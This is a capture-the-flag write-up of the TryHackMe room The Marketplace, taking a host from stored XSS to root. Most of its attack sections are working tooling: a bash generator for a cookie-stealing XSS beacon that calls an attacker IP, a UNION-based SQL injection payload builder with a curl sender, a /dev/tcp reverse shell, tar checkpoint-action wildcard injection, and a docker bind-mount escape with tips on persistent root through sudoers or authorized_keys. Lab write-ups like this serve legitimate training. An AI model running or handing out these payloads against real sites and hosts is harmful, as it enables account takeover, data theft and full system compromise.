Summary

In this video walk-through, we demonstrated gaining root on a host that runs an e-commerce marketplace backed by an SQL database. We started by exploiting a stored cross-site scripting (XSS) vulnerability in the marketplace's listings, which let us steal the administrator's session cookie and reach the admin area. There we found an SQL injection that exposed the database records. A temporary SSH password recovered from those records gave us a shell as a regular user; from there we escalated to a second user by abusing an unquoted wildcard in a tar-based backup script run through sudo, and that user's membership in the docker group let us start a container with the host's root filesystem bind-mounted into it and read the root flag.

This post covers the answers for The Marketplace room in TryHackMe.

Initial Reconnaissance & Web Exploitation

I started with an Nmap scan, which revealed three open ports: SSH (22), HTTP (80), and a second web server on port 32768 running Node.js. The default scripts also reported a disallowed /admin entry in robots.txt.

The website itself had the usual e-commerce features: login, sign-up, and product listings. The "New Listing" form stood out as an attack surface, because whatever is submitted there is later rendered to other users, including the administrator. After some testing, I found it was vulnerable to stored (persistent) cross-site scripting (XSS): the payload lives in the listing and fires in the browser of whoever views it.

I crafted a cookie-stealing XSS payload, planted it in a listing, and reported the listing so that the admin would review it. When the admin opened it, the payload ran in their browser and sent their session cookie to my listener. Two conditions have to hold for this to work: the cookie must not carry the HttpOnly flag (document.cookie cannot read it otherwise), and the admin must actually load the page. Replacing my own cookie with the stolen one hijacked the admin session, gave me access to /admin, and yielded the first flag.
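The cookie-theft channel described above, as an added example rather than the payload from the video: one helper builds the beacon that goes into the listing, the other recovers the cookie from the access-log line that a `python3 -m http.server` listener prints when the admin's browser calls home. It assumes that listener (on an attacker IP and port you supply), that the session cookie is not flagged HttpOnly, and a constructed sample log line in http.server's format.

```bash
#!/usr/bin/env bash
# Added example (not the room's or the author's exact payload).
#   xss_payload      builds the cookie-stealing <script> for the listing field
#   cookie_from_log  pulls the cookie back out of the access-log line that
#                    `python3 -m http.server` prints when the admin's browser
#                    calls home
# ASSUMPTIONS: the listener is python3's http.server on ATTACKER_IP:PORT, and
# the session cookie is NOT flagged HttpOnly (otherwise document.cookie is
# empty and you need a different primitive than cookie theft).

xss_payload() {   # usage: xss_payload ATTACKER_IP PORT
  local ip="$1" port="$2"
  # An Image() beacon is quieter than document.location: the admin's page is
  # not redirected, so nothing looks wrong while they review the listing.
  printf '<script>new Image().src="http://%s:%s/?c="+encodeURIComponent(document.cookie);</script>' \
    "$ip" "$port"
}

urldecode() {     # percent-decode one argument (undo encodeURIComponent)
  local s="${1//+/ }"
  printf '%b' "${s//%/\\x}"
}

cookie_from_log() {   # usage: cookie_from_log "<http.server log line>"
  local line="$1" enc
  case "$line" in
    *'GET /?c='*) ;;
    *) return 1 ;;                # not a beacon hit (favicon, scanners, ...)
  esac
  enc="${line#*GET /\?c=}"        # keep what follows the parameter
  enc="${enc%% HTTP/*}"           # drop the protocol version and status
  urldecode "$enc"
}

# Constructed sample log line, in the shape http.server prints for the beacon
# (404 because the listener serves no "/" with a query string; irrelevant here):
SAMPLE_LOG='10.10.14.5 - - [12/Mar/2024 10:11:12] "GET /?c=token%3DeyJhbGciOiJIUzI1NiJ9.e30.sig HTTP/1.1" 404 -'

main() {
  echo "payload to paste into the listing:"
  xss_payload 10.10.14.5 8000; echo
  echo "cookie recovered from the sample log line:"
  cookie_from_log "$SAMPLE_LOG"; echo
}
main
```

Start the listener with `python3 -m http.server 8000` in the directory of your choice, submit the payload in a listing, report it, and watch the log; `cookie_from_log` gives you the exact `name=value` string to paste into the browser's cookie store (or into `curl -b`) for the session hijack.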

Database Exploitation (SQL Injection)

Within the admin area I could see user details, and the URL parameter that selected them (user=ID) immediately looked like an SQL injection point.

I systematically explored the database:

  • I determined the number of columns in the original query with UNION SELECT, adding a column to the injected SELECT until the page stopped returning an error.
  • I retrieved database names, including Marketplace and information_schema.
  • I dumped table names within the Marketplace database, finding items, messages, and users.
  • I retrieved column names within the users table: ID, is_administrator, password, and username.
  • I then dumped usernames and password hashes from the users table.

Rather than crack the hashes, I looked at the messages table first. One message contained a temporary SSH password for a user. That password let me log in as jake over SSH and read the user flag.
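The enumeration sequence above, written out as an added example (the post only describes the payloads; these are not the author's). It assumes a numeric `user` parameter on /admin, a MySQL/MariaDB backend (information_schema, GROUP_CONCAT, 0x3a as a separator), that the original SELECT has NCOLS columns with column POS rendered into the page (both assumed values, with a probe to find the real ones), and that the stolen admin cookie is in $COOKIE when requests are actually sent.

```bash
#!/usr/bin/env bash
# Added example for the UNION-based enumeration steps; not the author's code.
# ASSUMPTIONS (adjust to the real target):
#   - the admin page takes a numeric parameter: /admin?user=<id>
#   - backend is MySQL/MariaDB (information_schema, GROUP_CONCAT, 0x3a = ':')
#   - the original SELECT has NCOLS columns and column POS is rendered in HTML
#   - COOKIE holds the hijacked admin cookie as name=value for send_payload

NCOLS=${NCOLS:-4}   # assumed; find it with union_probe_payloads first
POS=${POS:-2}       # assumed; the numbered column that shows up in the page

urlenc() {   # percent-encode one argument (payloads here are ASCII)
  local s="$1" out="" i c
  for (( i = 0; i < ${#s}; i++ )); do
    c="${s:i:1}"
    case "$c" in
      [A-Za-z0-9._~-]) out+="$c" ;;
      *) out+=$(printf '%%%02X' "'$c") ;;
    esac
  done
  printf '%s' "$out"
}

# sqli_payload NCOLS POS EXPR [FROM-AND-WHERE]
# Produces:  0 UNION SELECT 1,EXPR,3,...,NCOLS [FROM ...]
# user=0 matches no real row, so only the UNIONed row is rendered.
sqli_payload() {
  local ncols="$1" pos="$2" expr="$3" tail="${4:-}" i cols=""
  for (( i = 1; i <= ncols; i++ )); do
    if (( i == pos )); then cols+="$expr"; else cols+="$i"; fi
    if (( i < ncols )); then cols+=","; fi
  done
  if [ -n "$tail" ]; then printf '0 UNION SELECT %s FROM %s' "$cols" "$tail"
  else printf '0 UNION SELECT %s' "$cols"; fi
}

# Step 1: column count. Send these in turn; the first that renders without a
# database error gives NCOLS, and the number you see on the page gives POS.
union_probe_payloads() { local n; for n in 1 2 3 4 5 6; do sqli_payload "$n" 1 1; echo; done; }

# Steps 2-5: walk information_schema, then dump. Quote the schema name exactly
# as the schemata query returned it: names are case-sensitive on Linux MySQL.
enum_payloads() {
  sqli_payload "$NCOLS" "$POS" 'GROUP_CONCAT(schema_name)' 'information_schema.schemata'; echo
  sqli_payload "$NCOLS" "$POS" 'GROUP_CONCAT(table_name)'  "information_schema.tables WHERE table_schema='marketplace'"; echo
  sqli_payload "$NCOLS" "$POS" 'GROUP_CONCAT(column_name)' "information_schema.columns WHERE table_name='users'"; echo
  sqli_payload "$NCOLS" "$POS" 'GROUP_CONCAT(username,0x3a,password)' 'users'; echo
  # messages: list its columns the same way, then dump them like users above
  sqli_payload "$NCOLS" "$POS" 'GROUP_CONCAT(column_name)' "information_schema.columns WHERE table_name='messages'"; echo
}

# Send one payload to a live target (not exercised here):
#   send_payload http://TARGET PAYLOAD
send_payload() { curl -s -b "$COOKIE" "$1/admin?user=$(urlenc "$2")"; }

enum_payloads
```

GROUP_CONCAT collapses a whole column into one row, which matters because the page renders a single user record; without it you would see only the first table or user per request. If the output looks truncated, MySQL's group_concat_max_len default (1024 bytes) is the reason, and you page through with LIMIT/OFFSET instead.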

Privilege Escalation

Once I was in as Jake, I checked his sudo privileges:

  • sudo -l

This showed that jake could run /opt/backup.sh as the user michael without a password. I read the script:

  • cat /opt/backup.sh

The script ran tar with an unquoted wildcard (*). GNU tar accepts options anywhere on the command line, even after file operands, so a file in the globbed directory whose name begins with -- is parsed as an option instead of a file: the classic tar wildcard injection. I wrote a small script, shell.sh, containing a bash reverse shell (caught with netcat on my side):

  • echo 'bash -i >& /dev/tcp/<YOUR_IP>/4545 0>&1' > shell.sh
  • chmod +x shell.sh

I then planted the two files whose names tar parses as options: --checkpoint=1 makes tar pause at every record, and --checkpoint-action=exec=... runs a command at each pause. Both files, and shell.sh itself, have to sit in the directory that backup.sh globs, since that is where tar runs the command from:

  • echo "" > "--checkpoint-action=exec=sh shell.sh"
  • echo "" > "--checkpoint=1"

On my machine, I set up a Netcat listener:

  • nc -lvnp 4545

Then, I ran the backup.sh script as Michael:

  • sudo -u michael /opt/backup.sh

This triggered the reverse shell and gave me a shell as michael. Checking his groups (id) showed membership in the docker group, which is effectively root: anyone who can talk to the Docker daemon can have the root-owned daemon start a container of their choosing, including one with the host filesystem mounted inside.

I listed the Docker images:

  • docker images

Finally, I used the docker group membership to get root on the host. I started a container from one of the locally available images (alpine; a CTF box usually cannot pull from Docker Hub, which is why listing the images first matters) with the host's entire filesystem bind-mounted at /mnt, and chrooted into it:

  • docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Because the daemon runs as root and the container's root user is the host's root, the chrooted shell is a root shell on the host (--rm removes the container when it exits). I navigated to /root and retrieved the root flag.
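The escape from the previous step with the checks a practitioner runs around it, as an added example that is not the author's own command sequence. It assumes the shell belongs to a docker-group member (michael above), prefers an image that is already on the box over pulling alpine, and assumes `sh` exists both in the image and in the host root it chroots into.

```bash
#!/usr/bin/env bash
# Added example, not the author's exact commands: the bind-mount escape wrapped
# in the checks you want before and after it.

docker_preflight() {   # prints ok and returns 0 when the daemon is usable, else 2
  command -v docker >/dev/null 2>&1 || { echo "docker client not installed"; return 2; }
  id -nG | tr ' ' '\n' | grep -qx docker \
    || echo "note: not in the docker group; docker run will be refused unless you are root" >&2
  docker info >/dev/null 2>&1 || { echo "cannot talk to the docker daemon"; return 2; }
  echo ok
}

pick_image() {   # first image already present locally; alpine only as a fallback
  local img
  img=$(docker images --format '{{.Repository}}:{{.Tag}}' 2>/dev/null | grep -v '<none>' | head -n 1)
  printf '%s' "${img:-alpine}"
}

# Interactive root shell on the host: the daemon (root) bind-mounts / at /mnt,
# and chroot makes the container's sh operate on the host tree. --rm removes
# the container on exit so nothing is left behind.
docker_escape_shell() {
  docker run --rm -it -v /:/mnt "$(pick_image)" chroot /mnt sh
}

# Non-interactive proof instead of a shell: uid inside must be 0 and a
# root-only host file must be readable. Prints host-root on success.
docker_escape_check() {
  docker_preflight >/dev/null || return 2
  docker run --rm -v /:/mnt "$(pick_image)" \
    chroot /mnt sh -c 'test "$(id -u)" = 0 && test -r /etc/shadow && echo host-root'
}

if docker_preflight; then
  echo "image that will be used: $(pick_image)"
  echo "run docker_escape_check for a proof, docker_escape_shell for a shell"
fi
```

If chroot is not available in the image, the mount alone is already enough: `docker run --rm -v /:/mnt alpine cat /mnt/root/root.txt` reads the flag, and writing to /mnt/etc/sudoers or /mnt/root/.ssh/authorized_keys gives a persistent host root without ever leaving the container.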

Technical Commands Used:

  • python3 -m http.server (or python -m SimpleHTTPServer on Python 2)
  • echo <base64_string> | base64 -d
  • SQL Injection Payloads (conceptual, for UNION SELECT, information_schema.schemata, information_schema.tables, information_schema.columns, and dumping user data)
  • ssh jake@<IP_ADDRESS>
  • sudo -l
  • cat /opt/backup.sh
  • echo 'bash -i >& /dev/tcp/<YOUR_IP>/4545 0>&1' > shell.sh
  • echo "" > "--checkpoint-action=exec=sh shell.sh"
  • echo "" > "--checkpoint=1"
  • chmod +x shell.sh
  • sudo -u michael /opt/backup.sh
  • nc -lvnp 4545
  • docker images
  • docker run -v /:/mnt --rm -it alpine chroot /mnt sh
  • id
  • ls
  • cd /root
  • cat user.txt
  • cat root.txt

TryHackMe The Marketplace Answers

What is flag 1?

What is flag 2? (User.txt)

What is flag 3? (Root.txt)

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
